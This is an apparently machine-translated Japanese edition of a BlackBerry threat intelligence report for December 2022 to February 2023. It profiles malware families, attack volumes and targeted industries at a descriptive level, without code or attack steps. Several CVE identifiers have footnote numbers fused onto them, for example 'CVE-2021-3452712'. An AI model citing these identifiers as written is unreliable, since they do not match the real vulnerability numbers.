ビデオポスター画像

グローバル脅威インテリジェンス・レポート

実用的で文脈化されたインテリジェンスを提供し、サイバー耐性を高める

報告期間2022年12月~2023年2月

出版2023年4月

ダウンロード サブスクライブ

はじめに

BlackBerry では、今日の世界では、セキュリティ・リーダーはテクノロジーとその脆弱性だけに焦点を当てるのではなく、その対象を拡大する必要があると認識しています。効果的なリスク管理を行うためには、セキュリティ・リーダーはグローバルな脅威の状況を継続的に分析し、ビジネス上の意思決定が組織の脅威プロファイルにどのような影響を与えるかを理解する必要があります。同様に、ビジネス・リーダーも、セキュリティ態勢、リスク・エクスポージャー、サイバー防御戦略が自社の事業運営にどのような影響を与えるかを認識する必要があります。

BlackBerry Global Threat Intelligence Reportと当社の専門的なCylanceINTELLIGENCE™サブスクリプションサービスを通じて、現代のリーダーはこの重要な情報にタイムリーにアクセスすることができます。当社独自の人工知能(AI)主導の製品や分析機能から得られる遠隔測定に基づき、また他の公的および私的なインテリジェンス・ソースによって補完される形で、当社のグローバルなBlackBerry Threat Research and Intelligenceチームは、攻撃、脅威行為者、キャンペーンに関する実用的なインテリジェンスを提供します。これにより、お客様は十分な情報に基づいた意思決定を行い、迅速かつ効果的な行動を取ることができます。

本レポートの主なハイライトは以下の通り:

  • 数字で見る90日間2022年12月から2023年2月にかけて、1分あたり最大12件の攻撃が観測され、新しいマルウェアのサンプルを使用したユニークな攻撃の数は、前回のレポートでは1分あたり1件であったのに対し、今回のレポート期間中は1分あたり1.5件と、50%も急増しました。
  • この期間にサイバー攻撃を受けた上位10カ国。米国は依然として最も多くの攻撃を阻止した国である。しかし、脅威の状況は変化しており、現在ではブラジルが2番目に標的とされており、カナダと日本がそれに続いている。シンガポールが初めてトップ10入りした。
  • 攻撃回数で最も標的とされた業界 BlackBerry のテレメトリによると、金融、医療サービス、食品・日用品小売業界の顧客は、マルウェアを使用したサイバー攻撃全体の 60% を受けています。
  • 最も一般的な武器ドロッパー、ダウンローダー、リモートアクセスツール(RAT)、ランサムウェアが最も頻繁に使用されています。以下はそのプレビューである:この期間中、BlackBerry 、台湾の半導体メーカーに対するWarzone RATを使用した標的型攻撃、Agent TeslaおよびRedLine infostealerを使用したサイバー犯罪グループ、BlackCatランサムウェアの使用拡大が確認されました。
  • 業界特有の攻撃ヘルスケア業界は、この期間、非常に多くのサイバー攻撃に直面し、Cylance Endpoint Security は、増加する新しい Emotet サンプルを含め、毎日平均 59 件の新しい悪意のあるサンプルを阻止しました。この90日間で、BlackBerry のテクノロジーで保護された世界中の金融機関は、1日あたり最大34のユニークなマルウェアサンプルを含む231,000以上の攻撃をブロックしました。さらに、本レポートでは、政府機関、製造業、重要インフラストラクチャに対する攻撃を深く掘り下げています。これらの重要なセクターは、スパイ活動や知的財産権キャンペーンに従事する洗練された、時には国家に支援された脅威アクターによって標的とされることがよくあります。しかし、本レポートで明らかにしたように、これらの重要な業界では、犯罪ソフトウェアやコモディティ型マルウェアもしばしば見受けられます。

また、本レポートでは、注目すべき脅威アクターや武器、最も顕著な攻撃、そして最も重要なことですが、この期間に展開されたMITRE ATT&CKおよびMITRE D3FENDマッピングという形での行動可能な防御対策についても取り上げています。最後に、前回のレポートの予測精度の分析と、過去数ヶ月の出来事に基づく洞察に満ちた重要な要点のリストを提供します。

本号に掲載された詳細かつ実用的なデータすべてをご高覧いただければ幸いです。あらためて、執筆者である BlackBerry Threat Research and Intelligence チームの熟練したグローバル研究者に感謝の意を表したいと思います。最先端の研究を生み出す彼らの継続的な努力により、当社 、BlackBerry のデータおよびCylance AI を活用した製品およびサービスを継続的に改善することができます。

イスマエル・バレンズエラ
脅威リサーチ&インテリジェンス担当バイスプレジデントBlackBerry
ツイッターアバウトセキュリティ

BlackBerry サイバーセキュリティ脅威インテリジェンスの著者たち

数字で見るこの90日間

攻撃の総数とマルウェアのハッシュ数

2022年12月から2023年2月までに、BlackBerry によるCylance®Endpoint Security ソリューションは、157万8733件のマルウェアベースのサイバー攻撃を阻止しました。脅威行為者は、当社のテクノロジーで保護された顧客に対して1日平均約17,738件の悪意のあるサンプルを展開し、1分間に平均約12件の攻撃を行いました。

これらの脅威の中には、以前に確認された脅威とは異なる、200,454個の新しいマルウェアのサンプルが含まれています。これは、1日平均約2,252件、1分あたり約1.5件の新しいサンプルに相当します。これは、前回の報告期間の平均である1分あたり1件のユニークなサンプルから50%増加したことになります。

次のグラフは、Cylance Endpoint Securityソリューションが2022年12月から2023年2月までに防止したサイバー攻撃の動態を示している。12月の最終週である第4週の落ち込みは、年末年始の休暇に起因するものと思われ、第5週の急上昇は、一般的に人々が新年に仕事に復帰する日付に対応している。

攻撃の総数とマルウェアのハッシュ数
図1: この報告期間中、BlackBerry によって阻止されたサイバー攻撃。

攻撃の地理

一般的に、インターネットの普及率、経済、人口が多い国ほど、脅威が多く発生しています。当社の遠隔測定によると、この期間に脅威行為者は世界各国のBlackBerry クライアントを標的としていました。
攻撃の地理
図2:サイバー攻撃を最も阻止した国を赤と青で表す。
図 3 は、Cylance Endpoint Security ソリューションが最も多くのサイバー攻撃を防いだ 10 カ国を示しています。前回の報告期間と同様、BlackBerry が最も多くの攻撃を防いだのは米国でした。変化としては、ブラジルが最も攻撃を受けた国の第 2 位に浮上し、カナダと日本(前回のレポートでは第 2 位だった)が第 3 位と第 4 位に続いています。また、シンガポールが最も標的とされた国のトップ10に入ったのは今回が初めてである。
図3:BlackBerry の顧客がサイバー攻撃の標的にされた上位10カ国。
図4は、BlackBerry クライアントがユニークな悪意のあるサンプルで最も頻繁に攻撃された国を示しています。第 10 位にランクインした香港は、このリストに初登場です。
図4:BlackBerry で保護されたデバイスに対するサイバー攻撃で、ユニークな悪意のあるサンプルが使用された上位10カ国。

攻撃回数で最も標的とされた業種

この報告期間中にCylance エンドポイント・セキュリティ・ソリューションが保護した上位3業種は以下の通り:

  • 金融機関
  • 病院、診療所、医療機器などの医療サービスおよび医療機器
  • スーパーマーケット、ドラッグストア、食品を他の企業に販売する企業などを含む食品・日用品小売業

この3つの業界は、BlackBerry のクライアントに対するサイバー攻撃の60%を占めている。

攻撃回数で最も標的とされた業種
図5:この報告期間中に攻撃を受けた上位産業。

本報告期間中に攻撃に使用されたマルウェアの種類

この報告期間中に確認された最も広範で興味深いマルウェアファミリーを、オペレーティングシステム(OS)別に以下にまとめました。Microsoft® Windows®が依然として最も攻撃されているOSであるにもかかわらず、そのユーザは、他のユーザよりもマルウェア攻撃への備えが多少できている可能性があり、そのユーザは、自分の代替OSはサイバー攻撃から免れていると誤解している可能性があることに注意することが重要です。しかし、BlackBerry の遠隔測定データによると、macOS®、Linux®、およびモバイル・ユーザーも頻繁に攻撃を受けており、感染を免れるプラットフォームは存在しない。

ウィンドウズ

前述したように、マルウェアはどのOS上でも動作するが、Windowsは依然として最も攻撃されている。その理由としては、Windowsの人気の高さ、開発者が利用できるドキュメントの幅広さ、サイバー犯罪者のコミュニティでWindowsを攻撃する長年の経験が蓄積されており、フォーラムでヒントやトリックが頻繁に共有されていることなどが挙げられます。以下は、BlackBerry テレメトリーによって記録された、Windows の脅威のトップです。

ドロッパー/ダウンローダー

ダウンローダーは被害者を誘い、マルウェアをダウンロードするファイルを開かせる。このファイルは、正規のデジタル文書や実行ファイルを装うことがよくあります。

エモテ

Emotetは、2014年にバンキング型トロイの木馬として始まったモジュール型マルウェアです。何度かの自己追放と法執行機関の取り締まりを生き延びた後、Emotetは2022年末に再び姿を現し、この報告期間中の攻撃で頻繁に使用されました。Emotetの機能と使用方法は時間の経過とともに進化しており、現在では、Cobalt Strike BeaconIcedID、QBot、Trickbot、およびRyukや BlackCatを含むランサムウェアなどの追加のマルウェアのボットネット操作によるドロッパーおよび配信メカニズムとして機能しています。Emotetは、主にスパムメールや武器化されたMicrosoft®WordおよびExcel®文書を通じて拡散され、被害者の連絡先リストの全員に自身のコピーを送信することができます。

プライベートローダー

PrivateLoaderは、2021年に初めて野生で発見された比較的新しいダウンローダーである。その性質はモジュール式で、アンチ解析機能を含み、感染したホストに関する情報とメタデータを収集し、コマンド&コントロール(C2)サーバーに送信することができます。PrivateLoaderの主な目的は、追加のマルウェアのペイロードを配信し、爆発させることです。PrivateLoaderはSmokeLoaderRaccoonStealerRedLine、Vidarなどのコモディティマルウェア1も配布していることが確認されています。PrivateLoaderの複数のインスタンスが、幅広い業界にわたる多くのキャンペーンでRedLineをダウンロードすることが確認されています。

スモークローダー

2011年に初めて発見されたSmokeLoaderは、幾度かの変遷を経て、暗号マイナー、ランサムウェア、トロイの木馬、さらには販売時点情報管理(POS)マルウェアまで、あらゆるものを感染したシステムにロードするために使用される著名な脅威であり続けています。このマルウェアの初期のバージョンはSmokeLdrという名前でアンダーグラウンドのフォーラムで販売されていましたが、2014年以降はロシアを拠点とする脅威アクターのみに販売されています。2018年、SmokeLoaderはPROPagateコードインジェクション2手法を使用した最初のマルウェアとなりました。このマルウェアは、大規模な集団フィッシングキャンペーンに関連する悪意のある文書など、幅広い攻撃ベクトルを通じて配布することができます。2022年7月、BlackBerry Threat Research and Intelligenceチームは、SmokeLoaderがAmadey Botの新バージョンを配布しているのを観測しました。この攻撃の間、SmokeLoaderは、一般的なソフトウェアアプリケーション用の「クラックされた」ソフトウェア(別名「クラック」)やキー生成ツール(別名「キーゲン」)に隠されていました。このキャンペーンの背後にいた脅威行為者は、ブラックハットSEO手法3(別名SEOポイズニング)を利用して、マルウェアのサイトが関連する検索エンジンの検索結果の最上位またはその近くに表示されるようにし、クラックされたファイルを探している人々に悪意のある実行ファイルをダウンロードして実行するよう誘導しました。

アンチウイルスソリューションの中には、クラックやキーゲンをブロックするものがあるため、これらのファイルをダウンロードする前に、意図的にセキュリティ製品を無効にしたり、検出アラートを無視してダウンロードを続行したりする人もいます。その結果、広く検出された脅威であっても、被害者がマルウェアのダウンロードと実行を明示的に許可することで、システムに感染する可能性があります。

インフォステア

インフォステアーは、被害者のマシンから情報を収集し、攻撃者にその情報を提供する。以下は、この報告期間中に最も活発に活動した情報窃取者の一部である。

XLoader(別名Formbook)

Formbookは当初Babushka Crypterという名前だった。2020年に作者と思われる人物によって閉鎖された後、FormBookはXLoaderとして再ブランド化されました。その後、このマルウェアの系統は、2023年第1四半期にコモディティ・マルウェアとして悪用され、アンダーグラウンド・フォーラムでマルウェア・アズ・ア・サービス(MaaS)として販売されました。このマルウェアには、キーロギングや画面キャプチャといった一般的な機能が含まれています。Formbookは、LokiBotと呼ばれる別のコモディティマルウェアと同様のRunPEおよびプロセスホロウィング技術を利用することで、検出を回避しようとしています。

アライグマ

RaccoonStealerは通常MaaSとして配布され、1週間あたり約75米ドル、1ヶ月あたり約200米ドルから利用可能です。RaccoonStealerの中核機能は、被害者のホストシステムからパスワード、クッキー、暗号通貨ウォレットを盗むことです。RaccoonStealerの攻撃チェーンは、多くの場合、トロイの木馬化されたRARアーカイブをダウンロードすることから始まります。2022年3月、RaccoonStealerの背後にいる脅威アクターは、開発者の1人がロシアとウクライナの紛争で死亡したとされるため、その開発の中断を発表しました。短い休止期間の後、RaccoonStealer 2.0と名付けられた新しいバージョン4が2022年6月にハッキングフォーラムで発表されました。RaccoonStealer 2.0はゼロから開発され、新しいインフラを使用していると報告されている。

レッドライン

RedLineは、ブラウザ、ファイル転送プロトコル(FTP)、インスタントメッセージ(IM)アプリケーションからパスワードやクレジットカード情報を含むデータを流出させ、攻撃者に送り返される可能性のある(セキュリティソフトウェアを含む)インストール済みアプリケーションのリストを収集し、攻撃者が追加ファイルのアップロードやダウンロードなどのコマンドを実行できるようにします。RedLineは、アンダーグラウンドのダークマーケットやハッキングフォーラムで、スタンドアロンまたはサブスクリプションベースのモデルとして、わずか100~150米ドルで販売されています。今回の報告期間では、PrivateLoaderとAmadeyボットネットの両方がRedLineを使用していることが確認されました。

アイスドID

BokBotとしても知られるバンキング型トロイの木馬IcedIDは、2017年に初めて発見された。IcedIDは、レガシーのZeus(別名Zbot)やDridexinfostealerマルウェアに似た機能を備えています。このマルウェアは、被害者のデバイス上に追加のコモディティマルウェアを展開する第2段階のドロッパーとして最初に展開されることが多い。脅威行為者であるShatak(TA5515)は、IcedIDをMaaSとして使用していることが確認されており6、他のコモディティマルウェアの作成者や脅威行為者と協力する意思を示しています。

リモートアクセスのトロイの木馬とバックドア

本報告期間中、以下のリモートアクセス型トロイの木馬(RAT)が確認された。

ウォーゾーン/アヴェ・マリア

Warzone (aka Ave Maria) RATは、アンダーグラウンドおよびアバウトなフォーラムで販売されています。Warzoneの包括的な機能には、キーロギング、プロセス操作、コマンド実行、パスワードスクレイピング、ウェブカメラアクセス、リバースプロキシ設定、追加ファイルやマルウェアのダウンロードと実行のサポートなどが含まれます。

Warzoneは、月額22.95米ドルから始まる基本的なRATビルダーへの初期サブスクリプションと、より高価格のプレミアムバージョンの2段階の価格設定を提供している。プレミアムバージョンは、初心者の脅威行為者にアピールするように設計されており、ルートキット、隠しプロセス機能、プレミアムダイナミックDNS(DDNS)、カスタマーサポートなどの高度な機能を、3ヶ月のサブスクリプションで約800米ドルで提供しています。

このコモディティ型マルウェアは特定の標的を持たず、さまざまな脅威行為者やサイバーグループによって使用されています。前四半期、Warzoneは台湾の半導体メーカーに特化したキャンペーンで展開され、悪意のある.RARファイルの添付ファイルを通じて配信されました。

ダーククリスタル/DCRat

DarkCrystal(別名DCRat)は2018年に初めてリリースされ、入手可能な最も安価な.NETバックドアの1つで、価格は2カ月ライセンスで約5米ドルから、「ライフタイム」ライセンス(これは通常、脅威グループのライフタイムを意味する)で最大40米ドルとなっている。 

埋め込まれたコンフィギュレーション・ファイルは、実行時にどの機能を有効にするかを決定し、これにはスクリーンショット、キーロギング、ウェブ・ブラウザやクリップボードからのクッキーやパスワードの窃取などが含まれますが、これらに限定されるものではありません。ウクライナのコンピュータ緊急対応チーム(CERT-UA)は、ロシアとウクライナの紛争中にウクライナを標的にしたDarkCrystal7を観測した。

テスラ捜査官

この.NET RATは2014年に初めて観測され、MaaSオファリングの一部としてアンダーグラウンド・フォーラムでよく販売されています。このマルウェアは、Microsoft® Outlook®、Firefox®、Chrome™、Opera®など、一般的に使用されている60以上のアプリケーションからキー入力をキャプチャし、スクリーンショットを撮り、認証情報をスクレイピングします。エージェント・テスラは通常、悪意のある武器化された文書を通じて配信され、複数のアンチ解析およびアンチ検出テクニックを使用します。このRATは、最終的なペイロードを展開する前に、いくつかのレイヤーで自身を解凍し、ステガノグラフィーを使用して通常のファイルやメッセージにデータを隠します。

非同期RAT

このオープンソースのRATはGitHubで自由に利用可能8で、誰でもソースコードにアクセスし、ニーズに合わせて修正することができる。AsyncRATは、ウェブブラウザやアプリケーションからパスワードを盗むために、フリーで利用可能なStealerLibプラグインに依存しています。その他の機能としては、画面の表示や録画、Secure File Transfer Protocol(SFTP)を使用したアップロードやダウンロード機能、キーロギングなどがある。AsyncRATのアンチ解析およびアンチ検出技術には、サーバーの難読化が含まれます。脅威グループTA2541は、航空業界への攻撃においてAsyncRAT9を武器化しています。
ランサムウェア

ロイヤル

Royalは、2022年9月に初めて野生化した比較的新しいランサムウェアで、旧Contiランサムウェアグループのメンバーを含むと考えられています。Royalは、Windows、Linux、VMware® ESXiサーバを標的としています。このマルウェアは当初、不正広告やフィッシング・コールバック(フィッシングの誘い文句に、悪意のあるソフトウェアをインストールするようユーザーを誘うコールバック番号が含まれているスキーム)を介して配布されていました10。昨年12月、Royalの運営者は、英国の有名なF1レース場であるシルバーストーンへの攻撃11の責任を負いました。

ブラックバスタ

BlackBastaは、ランサムウェア・アズ・ア・サービス(RaaS)として活動する比較的新しいランサムウェア・グループで、2022年4月に初めて発見された。企業データを復号化するために身代金を要求し、データが一般に流出しないようにするために追加料金を強要するという、二重の恐喝手法を採用しています。

BlackBastaは攻撃にQakbot(別名Qbot)やPrintNightmare(CVE-2021-3452712)エクスプロイトなどのツールを使用し、被害者のデータをChaCha20とRSA-4096の組み合わせで暗号化します。BlackBastaの感染チェーンはターゲットによって異なり、他のランサムウェアグループよりも高速にデータを暗号化します。BlackBastaの動作の一部は、以前Contiグループが作成したマルウェアと類似しています。

ブラックキャット

2021年11月に初めて野生化したBlackCatランサムウェアは、Rustプログラミング言語で作成された最初の主要なランサムウェアファミリーでした。(本レポートで詳述されているように、Rustは、すべての主要なオペレーティングシステムをターゲットとするバイナリをクロスコンパイルする柔軟性を提供し、潜在的なターゲットやシステムの範囲を広げています)。このグループは、Emotetボットネットを使用してランサムウェアのペイロードを配信しています。足場が確立された後、Cobalt Strikeビーコンが展開され、脅威行為者がターゲットネットワーク内をより深く移動できるようにします。

BlackCatは設立当初から多発し、多くの著名な被害者を標的とし、二重、さらには三重の恐喝手法を使用しています。2022年のFBI勧告13によると、BlackCatランサムウェアの関連会社は、2つの古い脅威グループと関連している可能性がある:DarkSideとBlackMatterです。BlackCatは2023年2月、アイルランドのマンスター工科大学を攻撃して話題となりました。

macOS/OSX

AppleのmacOSは、WindowsやLinuxに比べて企業環境で使用される頻度が低いため、マルウェアの標的にされる頻度も低い。しかし、macOSデバイスはWindowsやLinuxに比べて「安全」であると多くの人が考えている一方で、macOSマルウェアは監視が必要な脅威として拡大しています。このセクションでは、BlackBerry の顧客環境で確認された macOS マルウェアのカテゴリについて説明します。

トロイの木馬/ダウンローダー

UpdateAgentトロイの木馬(WizardUpdateとしても知られる)はmacOSコンピュータを標的とし、2020年に初めて企業ネットワークに出現した。このマルウェアは、追加のペイロードをダウンロードして展開します。最も一般的なペイロードはアドウェアですが、最初のローダーはより悪質なコードをダウンロードして実行するために使用される可能性があります。UpdateAgentは、信頼できないアプリの実行を防ぐために設計されたmacOSのセキュリティ機能であるGatekeeperコントロールを回避することができるため、注意が必要です。

アドウェア

アドウェアは単なる迷惑行為とみなされることもあるが、それ以上に有害な場合もある。不要な広告の表示は、ユーザーの行動を監視したり、サーバーと通信したり、追加のデータやコードをダウンロードしたりといった悪意のある行動に依存しています。例えば、UpdateAgent トロイの木馬は、攻撃的なアドウェア AdLoad を展開します。当社は、この報告期間中に、macOSデバイスを使用する顧客の間で多数のAdLoad感染を防止しました。

また、Pirritアドウェアの継続的な使用も確認されました。このマルウェアは、感染したマシン上でスクリプトや追加のMachオブジェクトファイル形式(Mach-O)の実行ファイルをダウンロードし、起動します。

クロスプラットフォームのマルウェア

RustやGolang(別名 "Go")のようなクロスプラットフォームのプログラミング言語の出現により、脅威行為者はマルウェアを開発し、macOSを含む複数のオペレーティングシステム向けに同じコードベースをコンパイルすることができる。これにより、Windows以外のオペレーティングシステムを標的にする際の限界コストが削減されます。今回の報告期間中、Golangで記述されたMac®デバイスに影響を及ぼすマルウェアは、アドウェアの起動にのみ使用されていることが確認されましたが、今後、Mac向けのクロスプラットフォーム型マルウェアは、より野心的な目標を持つようになると予想されます。

リナックス

Linuxの人気は高まり続けている。パブリック・クラウド・サービス14の90%までがLinuxで稼働しており、かなりの数の企業がクラウド・サービスへの移行を進めているか、移行を計画している。さらに、Linux はモノのインターネット(IoT)でも一般的に使用されている。Linuxは企業では一般的なデスクトップOSではないため、感染の多くは、ユーザーに感染した添付ファイルを開かせるのではなく、ブルートフォース攻撃やネットワークやサーバーの脆弱性を突くなどの手法に頼っています。このような理由から、Linuxインフラに依存している組織では、サーバーを保護するための包括的な脆弱性管理プログラムが必要となります。

この報告期間中、BlackBerry の遠隔測定により、システムリソースを消費するだけでなく、犯罪者がリモートでシステムにアクセスできるようにするバックドアなど、他のマルウェアの展開を可能にする暗号マイナーを展開しようとする複数の Linux 攻撃が発見されました。

この報告期間には、複数のオペレーティングシステムを標的とするクロスプラットフォーム型のランサムウェアも増加している。例えば、新しいRoyalランサムウェアは、Linuxだけでなく、WindowsやESXiシステムも標的にすることができます。

暗号マイナー

暗号採掘者は、被害者のLinuxシステムリソースを使用して、金銭的利益を得るためにデジタル暗号通貨を採掘し、クリプトジャッキング15として知られている活動である。BlackBerry 研究者は以前、Dota3マルウェア・ファミリー16を使用した攻撃を検出した。このマルウェアは、脆弱なパスワードを使用するSSHサーバーを攻撃し、既知の暗号採掘者XMRig17をインストールする。2021年初頭から活動しているSysrv18暗号採掘ボットネットは、Goプログラミング言語でコンパイルされており、複数のオペレーティング・システム上で実行することができる。Sysrvは.shファイルからローダーをダウンロードしようとすることから、この攻撃がLinuxシステムを狙ったものであることがわかります。このボットネットには複数のエクスプロイトがあり、システムを侵害した後にXMRigを使用して暗号通貨Moneroを採掘します。

最近の攻撃は、GLPI(ヘルプデスクやIT資産の管理に通常使用されるオープンソースのサービス管理ソフトウェア)の脆弱性であるCVE-2022-3591419を悪用したものでした。攻撃者は、PwnKit (CVE-2021-403420)を悪用して権限の昇格を試みました。被害者のエンドポイントでは、XMRigやBillGatesとして知られるDoSツールなど、複数のマルウェアが見つかっています。

業界特有の攻撃

ヘルスケア

PWC21によると、ヘルスケアのデジタル化は業界にとって極めて重要な課題である。医療のデジタル化が進む中、業界は患者データと医療システム、インフラを確実に保護するセキュリティ対策を優先しなければなりません。サイバー犯罪者は、医療業界の複雑で相互接続され、老朽化しがちなデジタル・インフラの脆弱性を悪用しようとする動きを強めています。この報告期間中のサイバー脅威には、データ漏洩、ランサムウェア攻撃、その他の巧妙な脅威が含まれる。

トップ・ヘルスケアの脅威

この報告期間中、Cylance Endpoint Security は、5,246 個のユニークなマルウェア・サンプルを検出して阻止し、93,000 件以上の個別攻撃を回避しました。毎日平均で約59の新たな悪意のあるサンプルが特定され、阻止されていることから、この部門は引き続き重大な脅威に直面しています。

2022年、米国保健社会福祉省(HHS)は、医療がEmotetの主な標的であり、Emotetはボットネットで動作するドロッパーと、さまざまな悪意のあるペイロードを配信できる配信メカニズムに進化していると報告した22。Emotetは、ネットワーク内に侵入して横方向に移動するだけでなく、ランサムウェアを含むマルウェアの最初のアクセスポイントを提供することができるため、医療業界にとって重大な脅威となっています。この報告期間中、BlackBerry の遠隔測定では、医療機関を標的とした Emotet の使用が増加していることが示されました。

この他、ヘルスケアの脅威としては、前回の報告期間中に金融業界の脅威として上位にランクされた、初 期アクセス情報窃取プログラム「RedLine」が挙げられます。初期アクセスブローカー23(IAB)やランサムウェアの運営会社の関連会社は、盗んだ認証情報を使用してネットワークを侵害し、ランサムウェアを展開します。米国では、BlackCatやRoyal24をはじめとするランサムウェアの運営者が、ヘルスケア業界を積極的に標的としていました。Mallox25ランサムウェアも確認されている。

前回の報告書では、さまざまな脅威行為者(国家行為者を含む)が、Cobalt StrikeやBrute Ratelのような市販の侵入テストツールを使用し、サイバー犯罪攻撃と合法的なテスト活動の区別を困難にしていることを指摘した。今回の報告期間中、Cobalt Strikeの悪意のある使用は、ヘルスケア業界にとって最大の脅威でした。

財務

この報告期間中、BlackBerry®テクノロジーで保護された世界中の金融機関は、231,510 件のマルウェア攻撃を受け、1 日平均 2,601 件のマルウェア攻撃を受けました。これらの攻撃のうち、3,004件が新しいマルウェアサンプルによるもので、1日平均34件のユニークな攻撃を受けました。BlackCatは、銀行、信用組合、住宅ローン会社などの金融業界の顧客を標的とした最も活発なランサムウェアファミリーでした。

Metasploitは依然として金融業界を標的とする最も一般的なツールの1つであるが、ToddyCat26のような他の武器やグループも観察されるようになっている。この比較的新しい脅威主体は2021年に初めて報告され、通常ヨーロッパとアジア太平洋(APAC)地域を標的としています。今回の報告期間中、ToddyCatは歴史的にAPACとつながりのあるラテンアメリカの国の金融システムを標的に拡大しました。ToddyCat は、パッチが適用されていないMicrosoft®Exchange サーバーを攻撃することが知られており、デスクトップのエコシステム27 用のその他のインプラントも含まれています。

著名な RedLine 情報窃取ツールは、依然として金融機関を標的にするリーダー的存在です。IABスキームの一環として、RedLineは被害者のマシンから機密情報を収集、流出させ、第三者がブラックマーケットで販売します。RedLineの継続的な人気は、そのアクセスのしやすさ、価格設定、成功の歴史の結果です。

政府/公共団体

政府は、サイバー犯罪者にとって魅力的な、特に機密性の高い情報を保有している。その結果、政府はますます巧妙化する脅威に直面しています。脅威の主体は、その戦術、技術、手順(TTP)の多くを一致させており、個々の主体や独自の関連を特定することは困難になっています。

この報告期間中、Cylance エンドポイント・セキュリティ・ソリューションは、政府・公共サービス部門に対する4万件以上の個別攻撃を阻止し、6,318件のユニークなマルウェアサンプルを特定しました(毎日平均約70件のユニークなサンプルを特定)。攻撃には、情報窃取、高度な持続的脅威(APT)を利用したRAT、物理的なアクセスポイントを介した直接的な標的が含まれていました。

この分野では、コモディティ型マルウェアとして使用される情報窃取プログラムによる脅威が最も多かった。RedLine」と「SmokeLoader」は、最も一般的なマルウェアの1つです。この2つのマルウェアは、持続的アクセスのための次段 階のペイロードを配信するインフォスティーラーやダウンローダーとして機能し、一般的に、初 期感染を確立し、関係者に確立されたアクセスを販売するために使用されます。njRATやAllakoreを含むオープンソースの脅威も検出され、これらはいずれもSideCopyの標的型活動28で使用されています。

この報告期間には、ランサムウェアに移行する前の2010年代後半に恐喝キャンペーンで知られたPhorpiexボットネットを含む、感染したUSBデバイスを介して拡散した複数の脅威も含まれていました。太平洋諸島は、UNC419129として追跡されている脅威者によって直接標的にされました。また、グアムとフィリピンの複数のシステムで、リバースシェルとネクストステージのペイロードを起動するUSB感染型マルウェアが確認されています。

製造業

製造業は、以下のような多くの理由から、サイバー犯罪者にとって魅力的な標的である:

  • 製造業のサプライチェーンは脆弱な標的である。なぜなら、サプライチェーンのどこかで混乱が生じると、業界全体に波及する可能性があるからだ。
  • 多くのメーカーが特許やその他の知的財産を保有しているため、洗練された、さらには国家が後援する脅威行為者からのスパイ活動や窃盗キャンペーンの潜在的な有利な標的となっている。脅威行為者は知的財産を求めて盗まれたデータをスキャンし、貴重な資産は身代金を要求されたり、違法に売却されたりします(直接の競合他社に売却されることもあります)。
  • 大企業は多額の金融資産を保有していることが多く、ランサムウェア集団のような金銭的動機に基づく脅威行為者にとって魅力的な存在となっている。

製造業の脅威トップ

この報告期間中、RedLine、Emotet、RaccoonStealer v2(別名RecordBreaker)を含むコモディティ情報窃盗犯が、製造業に対する最も顕著な脅威であった。

当社の遠隔測定により、2022年12月中、台湾の半導体メーカーを標的にジオフェンシングを使用したAve Mariaダウンローダーのスタブが明らかになりました。悪意のあるファイルは.RARアーカイブにバンドルされ、一般的な地域のサードパーティサプライヤと一致するような名前が付けられていました(脅威アクターがよく使用するソーシャルエンジニアリングの手法)。被害者が実行ファイルを解凍して起動すると、Ave Maria RATの配信によって感染の連鎖が始まります。

また、メキシコを中心とした中南米の組織を標的とした情報窃取マルウェア「Mispadu(別名:Ursa)」の最近のサンプルも見つかりました。このマルチステージのマルウェアは、AutoITスクリプト言語を悪用し、主に銀行の認証情報やログインデータを盗むことに重点を置いています。

製造システムでは、リソースを大量に消費する自動化がますます進んでおり、クリプトジャッキングの格好の標的となっている。この報告期間には、XMRigオープンソースのCPU/GPUマイナーのバージョンなど、トロイの木馬化された暗号マイナーが大幅に増加しました。

製造業を取り巻く広範な脅威

製造業の脅威は拡大を続けている。2023年1月初旬、あるセキュリティ研究者が、ある自動車メーカーのウェブ向けワールドワイド・サプライチェーン管理アプリケーションに発見された脆弱性を公表した。この脆弱性が悪用された場合、攻撃者はサプライヤーの詳細情報や社内プロジェクトなどの機密データにアクセスできる可能性があった。研究者は発見をメーカーに報告し、メーカーが欠陥を修正できるようにした。

2023年2月初旬には、米国に拠点を置くネットワーク・ハードウェア・メーカー30が、1月にランサムウェア「Play」グループによる侵入を受けたことを確認した。また、2023年1月には、Viceランサムウェア・グループ(以前は医療や教育を標的とした攻撃を中心に行っていたが、ブラジルの製造業を標的にしていることが判明した31)が侵入した。

エネルギー

エネルギー企業は、複雑な供給ラインとグローバルなサプライヤーを管理し、利用率と埋蔵量の戦略のバランスを取り続ける。この業界は、地政学的な攻撃を計画する国家行為者にとって特に関心の高い業界である。電力管理におけるいかなる混乱も壊滅的な結果をもたらす可能性があるため、エネルギー業界は、システムへのアクセスを試みるソーシャル・エンジニアリングやスピアフィッシングの試みを認識し、回避するためのユーザ・トレーニングを行うなど、攻撃が成功する可能性を排除するために、非常に高いセキュリティ意識を持つ必要があります。

エネルギー業界のエコシステムには、ビジネスITシステム、重要なエネルギーインフラを含む運用技術(OT)、ITとOTの統合および相互接続をサポートする増加する技術が含まれます。2022年、ロシアはウクライナのエネルギー・グリッドを物理的およびデジタル的に標的としました。BlackBerry Threat Research and Intelligenceチームは、同国の電力システムをダウンさせ、混乱させる目的でIndestroyer2マルウェアが導入されたと高い確信を持っています。全体として、ロシアの攻撃は同国の電力インフラのほぼ半分に影響を及ぼし、ウクライナのエネルギー相は、長期化する攻撃は近い将来に止まりそうにないと予測している32。欧州連合(EU)はこれに迅速に対応し33 、エネルギー・インフラのサイバーセキュリティを優先するイニシアチブを推進した。

エネルギーのトップ脅威

この報告期間では、エネルギー産業がEmotetダウンローダーの標的となることが最も多かった。このマルウェア・ファミリーが広く浸透していることから、Emotetによる攻撃は今後も続くと考えられます。当社の遠隔測定では、エネルギー業界に影響を及ぼす RedLine、IcedID、FickerStealer などのコモディティ情報窃取プログラムも確認されました。これらのマルウェアは、MaaSとして比較的低価格で販売されているため、今後もエネルギー産業への攻撃に使用される可能性があります。これらの脅威はブロックに成功し、侵害や被害には至らなかったものの、エネルギー業界に対する攻撃の数が顕著に増加していることを表しています。

米国では、ランサムウェアグループのALPHVが、個人経営の天然ガス・石油生産会社34を標的にし、同社のシステムに侵入してBlackCatランサムウェアを展開した。同社は、この攻撃による混乱は最小限であったと主張していますが、二重の恐喝行為によって400GB以上の流出データが暴露されました。ALPHVはまた、コロンビアのエネルギー供給会社35を標的にし、オンライン・システムのダウンに成功した。

より広範なエネルギー脅威の状況

